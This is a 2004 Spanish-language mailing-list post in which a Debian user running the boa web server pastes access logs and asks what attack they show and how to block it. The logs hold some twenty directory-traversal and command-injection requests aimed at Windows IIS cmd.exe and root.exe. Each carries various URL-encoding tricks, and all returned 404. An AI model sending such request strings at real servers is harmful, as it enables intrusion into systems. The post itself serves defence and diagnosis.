Ataque al web server

Sun, 08 Feb 2004 05:21:58 -0600 

Hola a [EMAIL PROTECTED],

tengo un servidor web montado con boa (sencillo y eficaz) para poder
ver la documentación de Debian desde Mozilla con dwww.

Esta máquina también hace de pasarela de mi mini-red local conectando
por ppp a inet.

Hoy me ha dado por revisar los logs de bos y me encuentro:

62.147.188.173 - - [25/Jan/2004:01:29:44 +0000] "GET /scripts/root.exe?/c+dir 
HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:29:47 +0000] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:29:50 +0000] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:29:53 +0000] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:29:55 +0000] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:29:57 +0000] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:30:00 +0000] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:30:02 +0000] "GET
62.147.188./msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
62.147.188. HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:30:05 +0000] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:30:10 +0000] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:30:11 +0000] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:30:12 +0000] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:30:13 +0000] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:30:14 +0000] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:30:16 +0000] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
"-" "-"
62.147.188.173 - - [25/Jan/2004:01:30:18 +0000] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"

Naturalmente mis direcciones IP son del tipo 192.168.0.0 por lo que
esto viene del exterior.

¿Alguien puede aclarar qué tipo de ataque es y como evitarlo en el
futuro? Entiendo que no ha tenido éxito, ya que los ficheros referidos
son WINDOG y no existen en mi sistema.

¿Es suficiente la directiva Listen 192.168.X.X en /etc/boa/boa.conf
para evitar estos temas?

También tengo las directivas en /etc/hosts.deny:
        ALL: PARANOID
        ALL: ALL
y permitiendo solo las direcciones locales en /etc/hosts.allow, por lo
que no me explico cómo han podido acceder desde inet siendo IPs fuera
del rango permitido.

Gracias y ...
-- 
Un saludo.
Raúl Hernández <[EMAIL PROTECTED]>

Responder a